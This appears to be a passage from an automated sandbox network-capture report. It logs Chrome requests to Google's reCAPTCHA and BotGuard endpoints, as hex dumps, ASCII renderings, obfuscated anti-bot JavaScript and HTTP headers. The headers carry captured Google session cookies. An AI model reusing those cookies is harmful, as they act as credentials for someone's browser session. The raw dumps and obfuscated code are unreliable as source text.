                                                                                                                                                    2024-02-21 07:14:09 UTC1252INData Raw: 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 59 55 74 66 42 78 63 34 45 73 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 33 37 30 2d 30 33 37 37 2c 20 55 2b 30 33 37 41 2d 30 33 37 46 2c 20 55 2b 30 33 38 34 2d 30 33 38 41 2c 20 55 2b 30 33 38 43 2c 20 55 2b 30 33 38 45 2d 30 33 41 31 2c 20 55 2b 30 33 41 33 2d 30 33 46 46 3b 0a 7d 0a 2f 2a 20 76 69 65 74 6e 61 6d 65 73 65 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b
                                                                                                                                                    Data Ascii: l(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmYUtfBxc4EsA.woff2) format('woff2'); unicode-range: U+0370-0377, U+037A-037F, U+0384-038A, U+038C, U+038E-03A1, U+03A3-03FF;}/* vietnamese */@font-face { font-family: 'Roboto'; font-style: normal;
                                                                                                                                                    2024-02-21 07:14:09 UTC1252INData Raw: 20 55 2b 46 45 46 46 2c 20 55 2b 46 46 46 44 3b 0a 7d 0a 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 72 65 6c 65 61 73 65 73 2f 79 69 4e 57 33 52 39 6a 6b 79 4c 56 50 35 2d 45 45 5a 4c 44 7a 55 74 41 2f 73 74 79 6c 65 73 5f 5f 6c 74 72 2e 63 73 73 22 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 4a 79 64 73 41 56 65 46 57 59 42 65 4b 58 74 77 35 6d 59 52 38 67 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 77 69 6e 64 6f 77 5b 27 5f 5f 72 65 63 61 70 74 63 68 61 5f 61 70 69 27 5d 20 3d 20 27 68 74 74 70
                                                                                                                                                    Data Ascii: U+FEFF, U+FFFD;}</style><link rel="stylesheet" type="text/css" href="https://www.gstatic.com/recaptcha/releases/yiNW3R9jkyLVP5-EEZLDzUtA/styles__ltr.css"><script nonce="JydsAVeFWYBeKXtw5mYR8g" type="text/javascript">window['__recaptcha_api'] = 'http
                                                                                                                                                    2024-02-21 07:14:09 UTC1252INData Raw: 52 65 54 42 45 4f 64 49 74 55 4c 5f 59 70 78 38 32 7a 39 41 54 61 57 30 59 62 71 53 73 68 34 64 6b 79 6f 4f 7a 41 77 39 49 79 69 66 52 73 51 78 37 6f 42 63 58 7a 6a 45 49 75 32 53 38 6f 57 63 35 65 34 6a 64 47 45 6b 5f 4b 41 33 73 50 53 72 2d 6a 68 31 63 43 76 37 34 5a 62 77 4e 49 34 43 51 52 49 35 47 4f 71 57 39 37 74 67 53 59 39 68 55 4e 30 44 32 46 39 54 4f 4c 76 32 69 4e 33 43 59 79 50 70 34 51 68 58 62 36 42 2d 31 37 64 7a 6e 63 62 5f 37 4d 43 72 37 65 56 45 61 4c 73 31 64 43 52 69 74 4e 35 2d 4b 6a 32 61 57 53 6c 46 4d 72 63 4d 6b 69 30 71 47 6c 2d 6c 72 6d 72 74 6c 59 61 76 42 4b 35 34 38 46 35 2d 55 37 6d 33 35 63 78 76 5f 32 69 4b 4b 6a 4e 31 72 65 6b 51 7a 34 36 41 7a 6e 4a 43 67 79 55 59 52 45 75 49 6b 42 37 2d 54 67 70 78 5a 47 51 6c 76 53 30
                                                                                                                                                    Data Ascii: ReTBEOdItUL_Ypx82z9ATaW0YbqSsh4dkyoOzAw9IyifRsQx7oBcXzjEIu2S8oWc5e4jdGEk_KA3sPSr-jh1cCv74ZbwNI4CQRI5GOqW97tgSY9hUN0D2F9TOLv2iN3CYyPp4QhXb6B-17dzncb_7MCr7eVEaLs1dCRitN5-Kj2aWSlFMrcMki0qGl-lrmrtlYavBK548F5-U7m35cxv_2iKKjN1rekQz46AznJCgyUYREuIkB7-TgpxZGQlvS0
                                                                                                                                                    2024-02-21 07:14:09 UTC1252INData Raw: 59 55 66 4e 74 6e 4e 66 74 4f 6d 6a 73 69 36 66 38 31 76 62 44 77 53 6d 45 4c 37 4e 55 6b 76 69 69 63 65 39 48 63 5f 70 30 4f 52 49 4d 65 35 5f 6d 52 54 4c 6d 76 43 6b 4b 78 36 76 71 55 71 72 4e 74 6f 4c 55 5f 79 4f 58 78 48 7a 69 77 56 71 71 7a 79 42 6a 4d 6e 44 2d 6a 74 5f 39 62 79 4e 74 62 73 6a 33 6c 49 59 78 42 58 30 6a 35 41 33 70 6c 56 5a 43 46 56 56 53 62 32 55 31 6a 6d 49 46 37 37 73 79 4b 42 71 32 70 51 6b 44 6a 30 47 76 51 66 41 39 4b 63 4f 75 39 61 62 47 78 51 31 6e 6d 4b 51 50 69 57 75 74 46 7a 56 64 53 48 6a 76 66 64 6a 33 6b 31 71 4c 4c 47 68 63 33 6d 44 4a 54 47 6d 5a 58 70 44 67 6c 79 2d 68 53 37 37 4a 6f 54 58 70 6b 52 6f 68 50 4f 6c 4d 4d 52 33 53 4b 43 30 36 61 7a 5a 77 69 5f 71 50 56 67 22 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d
                                                                                                                                                    Data Ascii: YUfNtnNftOmjsi6f81vbDwSmEL7NUkviice9Hc_p0ORIMe5_mRTLmvCkKx6vqUqrNtoLU_yOXxHziwVqqzyBjMnD-jt_9byNtbsj3lIYxBX0j5A3plVZCFVVSb2U1jmIF77syKBq2pQkDj0GvQfA9KcOu9abGxQ1nmKQPiWutFzVdSHjvfdj3k1qLLGhc3mDJTGmZXpDgly-hS77JoTXpkRohPOlMMR3SKC06azZwi_qPVg"><script type=
                                                                                                                                                    2024-02-21 07:14:09 UTC574INData Raw: 32 57 6d 6c 44 63 44 6c 5a 4e 6c 56 51 57 44 56 73 5a 33 56 68 65 54 67 76 61 6c 6f 30 51 6c 70 33 54 6d 52 6d 61 43 74 75 62 30 78 6b 57 55 68 35 4e 57 46 46 56 6d 63 72 64 57 6c 51 62 57 34 32 64 47 39 55 56 56 52 4b 55 55 77 72 63 6e 68 5a 53 31 4a 6c 54 58 67 33 64 47 55 32 56 6a 52 49 55 6e 68 42 52 57 67 76 54 6a 52 4f 51 30 64 61 53 44 5a 51 62 30 59 78 54 6b 64 6f 64 55 6c 33 62 44 67 35 4d 44 5a 33 64 47 6f 7a 52 55 64 36 55 6c 46 6a 53 7a 6b 31 5a 32 5a 5a 54 57 39 77 65 48 46 4c 4e 6d 78 47 61 31 68 36 56 6b 51 30 5a 33 51 79 64 48 64 34 4f 44 4a 44 51 7a 6c 4b 55 44 4e 77 54 6c 5a 6e 55 55 55 78 55 6d 4d 31 52 43 39 56 57 45 5a 79 55 58 46 77 59 31 70 78 57 6d 5a 79 4e 55 35 4f 54 6b 31 34 65 55 70 6c 54 32 64 4b 61 55 70 45 63 48 4a 71 63 7a
                                                                                                                                                    Data Ascii: 2WmlDcDlZNlVQWDVsZ3VheTgvalo0Qlp3TmRmaCtub0xkWUh5NWFFVmcrdWlQbW42dG9UVVRKUUwrcnhZS1JlTXg3dGU2VjRIUnhBRWgvTjROQ0daSDZQb0YxTkdodUl3bDg5MDZ3dGozRUd6UlFjSzk1Z2ZZTW9weHFLNmxGa1h6VkQ0Z3QydHd4ODJDQzlKUDNwTlZnUUUxUmM1RC9VWEZyUXFwY1pxWmZyNU5OTk14eUplT2dKaUpEcHJqcz


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    9192.168.2.549724142.250.65.2284437220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-02-21 07:14:10 UTC1445OUTGET /js/bg/zyvIRxypJp9XsXP7bFrUBd8JY_zCSu2ya-bkldlMTk8.js HTTP/1.1
                                                                                                                                                    Host: www.google.com
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: */*
                                                                                                                                                    X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                    Referer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b&co=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbTo0NDM.&hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA&size=normal&s=xz3LsDhnVKWNDPAxYsfSai-65gQfUWB55L8TFubhcQqJlrltbCH3uiMgqw9QAslta7P_yQ2bZH1ORXgoYVB-hTK_zEC7bXvNca4AZA-u_gcND1aHqzQAuQdE8YR_32tCw2qLxz-xd4-Z3Nm9D50Nbwkns7louT2dRkQLmWk-2Dn-QozQIbnlAs_c6yUIm5PKVMMSXO7KlIPqv21jVxvuhA6gVzHJJcirmiwhSjBz4o70vFTT38JJB0MyLvqVTg1YM6Qx6WiknHHxvIM6RlgthjUDYRm3_PM&cb=px5dhzo8o1yu
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-21-07; AEC=Ae3NU9MBixZLIde_1N07qJj3s37lv5ooCeQDtC9mj3Hmwo7WGjwK0pzd8w
                                                                                                                                                    2024-02-21 07:14:10 UTC812INHTTP/1.1 200 OK
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/botguard-scs
                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin; report-to="botguard-scs"
                                                                                                                                                    Report-To: {"group":"botguard-scs","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/botguard-scs"}]}
                                                                                                                                                    Content-Length: 17265
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    Server: sffe
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Date: Sun, 18 Feb 2024 03:56:51 GMT
                                                                                                                                                    Expires: Mon, 17 Feb 2025 03:56:51 GMT
                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                    Last-Modified: Mon, 05 Feb 2024 17:30:00 GMT
                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Age: 271039
                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                    Connection: close
                                                                                                                                                    2024-02-21 07:14:10 UTC440INData Raw: 2f 2a 20 41 6e 74 69 2d 73 70 61 6d 2e 20 57 61 6e 74 20 74 6f 20 73 61 79 20 68 65 6c 6c 6f 3f 20 43 6f 6e 74 61 63 74 20 28 62 61 73 65 36 34 29 20 59 6d 39 30 5a 33 56 68 63 6d 51 74 59 32 39 75 64 47 46 6a 64 45 42 6e 62 32 39 6e 62 47 55 75 59 32 39 74 20 2a 2f 20 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 42 3d 66 75 6e 63 74 69 6f 6e 28 64 29 7b 72 65 74 75 72 6e 20 64 7d 2c 58 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 4a 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 7a 29 7b 69 66 28 7a 3d 28 64 3d 58 2e 74 72 75 73 74 65 64 54 79 70 65 73 2c 6e 75 6c 6c 29 2c 21 64 7c 7c 21 64 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 29 72 65 74 75 72 6e 20 7a 3b 74 72 79 7b 7a 3d 64 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 28 22 62 67 22 2c 7b 63 72 65 61 74 65 48 54 4d 4c 3a
                                                                                                                                                    Data Ascii: /* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t */ (function(){var B=function(d){return d},X=this||self,J=function(d,z){if(z=(d=X.trustedTypes,null),!d||!d.createPolicy)return z;try{z=d.createPolicy("bg",{createHTML:
                                                                                                                                                    2024-02-21 07:14:10 UTC1252INData Raw: 63 72 65 61 74 65 53 63 72 69 70 74 28 49 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 49 29 7b 72 65 74 75 72 6e 22 22 2b 49 7d 7d 28 58 29 28 41 72 72 61 79 28 37 38 32 34 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 7c 30 29 2e 6a 6f 69 6e 28 22 5c 6e 22 29 2b 27 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 7a 4e 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 7a 2c 58 2c 49 2c 56 2c 61 29 7b 66 6f 72 28 56 3d 28 49 3d 28 58 3d 28 7a 3d 6d 28 28 61 3d 64 5b 64 61 5d 7c 7c 7b 7d 2c 64 29 29 2c 61 2e 77 6b 3d 6d 28 64 29 2c 61 2e 4e 3d 5b 5d 2c 64 2e 54 3d 3d 64 3f 28 62 28 64 29 7c 30 29 2d 31 3a 31 29 2c 6d 28 64 29 29 2c 30 29 3b 56 3c 58 3b 56 2b 2b 29 61 2e 4e 2e 70 75 73 68 28 6d 28 64 29 29 3b 66 6f 72 28 61 2e 4a 65 3d 66 28 64 2c 7a 29 2c 61 2e 65 73 3d 66 28 64 2c
                                                                                                                                                    Data Ascii: createScript(I)}:function(I){return""+I}}(X)(Array(7824*Math.random()|0).join("\n")+'(function(){var zN=function(d,z,X,I,V,a){for(V=(I=(X=(z=m((a=d[da]||{},d)),a.wk=m(d),a.N=[],d.T==d?(b(d)|0)-1:1),m(d)),0);V<X;V++)a.N.push(m(d));for(a.Je=f(d,z),a.es=f(d,
                                                                                                                                                    2024-02-21 07:14:10 UTC1252INData Raw: 7b 74 28 61 2c 64 29 2c 58 3d 64 2e 4c 7d 49 28 58 29 7d 65 6c 73 65 20 69 66 28 56 3d 3d 73 4b 29 7a 5b 33 5d 26 26 28 64 2e 58 3d 74 72 75 65 29 2c 7a 5b 34 5d 26 26 28 64 2e 55 3d 74 72 75 65 29 2c 64 2e 6f 28 7a 29 3b 65 6c 73 65 20 69 66 28 56 3d 3d 63 29 64 2e 58 3d 74 72 75 65 2c 64 2e 6f 28 7a 29 3b 65 6c 73 65 20 69 66 28 56 3d 3d 4a 53 29 7b 64 2e 58 3d 74 72 75 65 3b 74 72 79 7b 66 6f 72 28 58 3d 30 3b 58 3c 64 2e 75 2e 6c 65 6e 67 74 68 3b 58 2b 2b 29 74 72 79 7b 49 3d 64 2e 75 5b 58 5d 2c 49 5b 30 5d 5b 49 5b 31 5d 5d 28 49 5b 32 5d 29 7d 63 61 74 63 68 28 61 29 7b 7d 7d 63 61 74 63 68 28 61 29 7b 7d 28 30 2c 7a 5b 31 5d 29 28 66 75 6e 63 74 69 6f 6e 28 61 2c 6c 29 7b 64 2e 56 28 61 2c 74 72 75 65 2c 6c 29 7d 2c 28 64 2e 75 3d 5b 5d 2c 66 75
                                                                                                                                                    Data Ascii: {t(a,d),X=d.L}I(X)}else if(V==sK)z[3]&&(d.X=true),z[4]&&(d.U=true),d.o(z);else if(V==c)d.X=true,d.o(z);else if(V==JS){d.X=true;try{for(X=0;X<d.u.length;X++)try{I=d.u[X],I[0][I[1]](I[2])}catch(a){}}catch(a){}(0,z[1])(function(a,l){d.V(a,true,l)},(d.u=[],fu
                                                                                                                                                    2024-02-21 07:14:10 UTC1252INData Raw: 6f 6e 28 49 29 7b 7a 2e 54 6f 28 49 29 2c 64 2e 54 6f 28 49 29 7d 2c 28 64 3d 28 7a 3d 6e 65 77 20 28 58 2e 70 72 6f 74 6f 74 79 70 65 2e 72 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 30 3d 3d 3d 74 68 69 73 2e 6e 29 72 65 74 75 72 6e 5b 30 2c 30 5d 3b 72 65 74 75 72 6e 5b 28 74 68 69 73 2e 57 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 49 2c 56 29 7b 72 65 74 75 72 6e 20 49 2d 56 7d 29 2c 74 68 69 73 2e 6e 29 2c 74 68 69 73 2e 57 5b 74 68 69 73 2e 57 2e 6c 65 6e 67 74 68 3e 3e 31 5d 5d 7d 2c 58 2e 70 72 6f 74 6f 74 79 70 65 2e 54 6f 3d 66 75 6e 63 74 69 6f 6e 28 49 2c 56 29 7b 28 74 68 69 73 2e 6e 2b 2b 2c 35 30 29 3e 74 68 69 73 2e 57 2e 6c 65 6e 67 74 68 3f 74 68 69 73 2e 57 2e 70 75 73 68 28 49 29 3a 28 56 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 4d
                                                                                                                                                    Data Ascii: on(I){z.To(I),d.To(I)},(d=(z=new (X.prototype.rk=function(){if(0===this.n)return[0,0];return[(this.W.sort(function(I,V){return I-V}),this.n),this.W[this.W.length>>1]]},X.prototype.To=function(I,V){(this.n++,50)>this.W.length?this.W.push(I):(V=Math.floor(M
                                                                                                                                                    2024-02-21 07:14:10 UTC1252INData Raw: 28 49 3d 76 6f 69 64 20 30 2c 7a 2e 46 29 56 3d 5a 72 28 7a 2e 46 2c 7a 29 3b 65 6c 73 65 7b 69 66 28 58 3d 66 28 7a 2c 34 32 34 29 2c 58 3e 3d 61 29 62 72 65 61 6b 3b 56 3d 66 28 7a 2c 28 49 3d 6d 28 28 55 28 32 31 31 2c 7a 2c 58 29 2c 7a 29 29 2c 49 29 29 7d 56 26 26 56 5b 78 5d 26 32 30 34 38 3f 56 28 7a 2c 64 29 3a 53 28 7a 2c 5b 6e 2c 32 31 2c 49 5d 2c 30 29 2c 51 28 7a 2c 64 2c 66 61 6c 73 65 2c 66 61 6c 73 65 29 7d 63 61 74 63 68 28 6c 29 7b 66 28 7a 2c 34 37 30 29 3f 53 28 7a 2c 6c 2c 32 32 29 3a 55 28 34 37 30 2c 7a 2c 6c 29 7d 69 66 28 21 64 29 7b 69 66 28 7a 2e 58 42 29 7b 45 4b 28 32 34 36 35 35 33 30 30 37 32 37 34 2c 28 7a 2e 42 2d 2d 2c 7a 29 29 3b 72 65 74 75 72 6e 7d 53 28 7a 2c 5b 6e 2c 33 33 5d 2c 30 29 7d 7d 63 61 74 63 68 28 6c 29 7b
                                                                                                                                                    Data Ascii: (I=void 0,z.F)V=Zr(z.F,z);else{if(X=f(z,424),X>=a)break;V=f(z,(I=m((U(211,z,X),z)),I))}V&&V[x]&2048?V(z,d):S(z,[n,21,I],0),Q(z,d,false,false)}catch(l){f(z,470)?S(z,l,22):U(470,z,l)}if(!d){if(z.XB){EK(246553007274,(z.B--,z));return}S(z,[n,33],0)}}catch(l){
                                                                                                                                                    2024-02-21 07:14:10 UTC1252INData Raw: 28 64 2c 7a 29 7b 72 65 74 75 72 6e 20 7a 3d 30 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 7a 3c 64 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 66 61 6c 73 65 2c 76 61 6c 75 65 3a 64 5b 7a 2b 2b 5d 7d 3a 7b 64 6f 6e 65 3a 74 72 75 65 7d 7d 7d 2c 53 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 7a 2c 58 2c 49 2c 56 2c 61 29 7b 69 66 28 21 64 2e 46 42 26 26 28 49 3d 76 6f 69 64 20 30 2c 7a 26 26 7a 5b 30 5d 3d 3d 3d 6e 26 26 28 49 3d 7a 5b 32 5d 2c 58 3d 7a 5b 31 5d 2c 7a 3d 76 6f 69 64 20 30 29 2c 56 3d 66 28 64 2c 34 34 38 29 2c 30 3d 3d 56 2e 6c 65 6e 67 74 68 26 26 28 61 3d 66 28 64 2c 32 31 31 29 3e 3e 33 2c 56 2e 70 75 73 68 28 58 2c 61 3e 3e 38 26 32 35 35 2c 61 26 32 35 35 29 2c 76 6f 69 64 20 30 21 3d 49 26 26 56 2e 70 75 73 68 28 49 26 32 35 35
                                                                                                                                                    Data Ascii: (d,z){return z=0,function(){return z<d.length?{done:false,value:d[z++]}:{done:true}}},S=function(d,z,X,I,V,a){if(!d.FB&&(I=void 0,z&&z[0]===n&&(I=z[2],X=z[1],z=void 0),V=f(d,448),0==V.length&&(a=f(d,211)>>3,V.push(X,a>>8&255,a&255),void 0!=I&&V.push(I&255
                                                                                                                                                    2024-02-21 07:14:10 UTC1252INData Raw: 3d 30 2c 64 29 2c 49 29 3b 30 3c 47 3b 29 68 3d 56 25 38 2c 43 3d 38 2d 28 68 7c 30 29 2c 48 3d 56 3e 3e 33 2c 61 3d 7a 2e 48 5b 48 5d 2c 43 3d 43 3c 47 3f 43 3a 47 2c 58 26 26 28 4e 3d 7a 2c 42 3d 56 2c 4e 2e 44 21 3d 42 3e 3e 36 26 26 28 4e 2e 44 3d 42 3e 3e 36 2c 42 3d 66 28 4e 2c 33 38 39 29 2c 4e 2e 4c 65 3d 78 76 28 4e 2e 68 2c 5b 30 2c 30 2c 42 5b 31 5d 2c 42 5b 32 5d 5d 2c 4e 2e 44 29 29 2c 61 5e 3d 7a 2e 4c 65 5b 48 26 6c 5d 29 2c 4a 7c 3d 28 61 3e 3e 38 2d 28 68 7c 30 29 2d 28 43 7c 30 29 26 28 31 3c 3c 43 29 2d 31 29 3c 3c 28 47 7c 30 29 2d 28 43 7c 30 29 2c 47 2d 3d 43 2c 56 2b 3d 43 3b 72 65 74 75 72 6e 20 55 28 34 32 34 2c 28 58 3d 4a 2c 7a 29 2c 28 49 7c 30 29 2b 28 64 7c 30 29 29 2c 58 7d 2c 71 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 7a 2c 58
                                                                                                                                                    Data Ascii: =0,d),I);0<G;)h=V%8,C=8-(h|0),H=V>>3,a=z.H[H],C=C<G?C:G,X&&(N=z,B=V,N.D!=B>>6&&(N.D=B>>6,B=f(N,389),N.Le=xv(N.h,[0,0,B[1],B[2]],N.D)),a^=z.Le[H&l]),J|=(a>>8-(h|0)-(C|0)&(1<<C)-1)<<(G|0)-(C|0),G-=C,V+=C;return U(424,(X=J,z),(I|0)+(d|0)),X},q=function(d,z,X
                                                                                                                                                    2024-02-21 07:14:10 UTC1252INData Raw: 29 7b 69 66 28 64 2e 46 29 72 65 74 75 72 6e 20 5a 72 28 64 2e 4f 2c 64 29 3b 72 65 74 75 72 6e 28 7a 3d 75 28 38 2c 64 2c 74 72 75 65 29 2c 7a 26 31 32 38 29 26 26 28 7a 5e 3d 31 32 38 2c 64 3d 75 28 32 2c 64 2c 74 72 75 65 29 2c 7a 3d 28 7a 3c 3c 32 29 2b 28 64 7c 30 29 29 2c 7a 7d 2c 77 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 7a 2c 58 2c 49 2c 56 29 7b 56 3d 74 68 69 73 3b 74 72 79 7b 52 73 28 49 2c 64 2c 7a 2c 74 68 69 73 2c 58 29 7d 63 61 74 63 68 28 61 29 7b 74 28 61 2c 74 68 69 73 29 2c 49 28 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 6c 28 56 2e 4c 29 7d 29 7d 7d 2c 6b 76 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 7a 29 7b 72 65 74 75 72 6e 20 64 28 66 75 6e 63 74 69 6f 6e 28 58 29 7b 58 28 7a 29 7d 29 2c 5b 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 7a
                                                                                                                                                    Data Ascii: ){if(d.F)return Zr(d.O,d);return(z=u(8,d,true),z&128)&&(z^=128,d=u(2,d,true),z=(z<<2)+(d|0)),z},w=function(d,z,X,I,V){V=this;try{Rs(I,d,z,this,X)}catch(a){t(a,this),I(function(l){l(V.L)})}},kv=function(d,z){return d(function(X){X(z)}),[function(){return z
                                                                                                                                                    2024-02-21 07:14:10 UTC1252INData Raw: 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 61 29 3b 4b 28 74 72 75 65 2c 28 46 28 5b 28 46 28 5b 28 46 28 28 59 28 66 75 6e 63 74 69 6f 6e 28 42 29 7b 55 4b 28 34 2c 42 29 7d 2c 34 31 35 2c 28 28 59 28 66 75 6e 63 74 69 6f 6e 28 42 2c 4a 2c 48 2c 43 2c 47 2c 4e 2c 68 2c 41 2c 4d 2c 4c 2c 72 2c 45 29 7b 66 75 6e 63 74 69 6f 6e 20 52 28 70 2c 57 29 7b 66 6f 72 28 3b 4e 3c 70 3b 29 72 7c 3d 62 28 42 29 3c 3c 4e 2c 4e 2b 3d 38 3b 72 65 74 75 72 6e 20 57 3d 72 26 28 28 4e 2d 3d 70 2c 31 29 3c 3c 70 29 2d 31 2c 72 3e 3e 3d 70 2c 57 7d 66 6f 72 28 4c 3d 28 48 3d 28 72 3d 28 68 3d 6d 28 42 29 2c 4e 3d 30 29 2c 47 3d 28 52 28 33 29 7c 30 29 2b 31 2c 52 28 35 29 29 2c 5b 5d 29 2c 4a 3d 45 3d 30 3b 45 3c 48 3b 45 2b 2b 29 4d 3d 52 28 31 29 2c 4c 2e 70 75 73 68 28 4d 29
                                                                                                                                                    Data Ascii: fromCharCode(a);K(true,(F([(F([(F((Y(function(B){UK(4,B)},415,((Y(function(B,J,H,C,G,N,h,A,M,L,r,E){function R(p,W){for(;N<p;)r|=b(B)<<N,N+=8;return W=r&((N-=p,1)<<p)-1,r>>=p,W}for(L=(H=(r=(h=m(B),N=0),G=(R(3)|0)+1,R(5)),[]),J=E=0;E<H;E++)M=R(1),L.push(M)
                                                                                                                                                    2024-02-21 07:14:10 UTC1252INData Raw: 4e 3d 66 28 28 4a 3d 66 28 28 4a 3d 28 47 3d 6d 28 28 68 3d 6d 28 28 4e 3d 6d 28 42 29 2c 42 29 29 2c 42 29 29 2c 6d 29 28 42 29 2c 42 29 2c 4a 29 2c 42 29 2c 4e 29 2c 42 29 2c 47 29 2c 68 3d 66 28 42 2c 68 29 2c 22 6f 62 6a 65 63 74 22 29 3d 3d 69 44 28 4e 29 29 7b 66 6f 72 28 48 20 69 6e 20 43 3d 5b 5d 2c 4e 29 43 2e 70 75 73 68 28 48 29 3b 4e 3d 43 7d 69 66 28 42 2e 54 3d 3d 42 29 66 6f 72 28 42 3d 30 2c 47 3d 30 3c 47 3f 47 3a 31 2c 48 3d 4e 2e 6c 65 6e 67 74 68 3b 42 3c 48 3b 42 2b 3d 47 29 68 28 4e 2e 73 6c 69 63 65 28 42 2c 28 42 7c 30 29 2b 28 47 7c 30 29 29 2c 4a 29 7d 7d 2c 28 59 28 66 75 6e 63 74 69 6f 6e 28 42 29 7b 6d 76 28 42 2c 34 29 7d 2c 35 30 34 2c 28 59 28 66 75 6e 63 74 69 6f 6e 28 42 2c 4a 2c 48 2c 43 2c 47 29 7b 28 47 3d 66 28 42 2c
                                                                                                                                                    Data Ascii: N=f((J=f((J=(G=m((h=m((N=m(B),B)),B)),m)(B),B),J),B),N),B),G),h=f(B,h),"object")==iD(N)){for(H in C=[],N)C.push(H);N=C}if(B.T==B)for(B=0,G=0<G?G:1,H=N.length;B<H;B+=G)h(N.slice(B,(B|0)+(G|0)),J)}},(Y(function(B){mv(B,4)},504,(Y(function(B,J,H,C,G){(G=f(B,


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    10192.168.2.549727142.250.65.2284437220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-02-21 07:14:10 UTC1457OUTGET /recaptcha/api2/webworker.js?hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA HTTP/1.1
                                                                                                                                                    Host: www.google.com
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
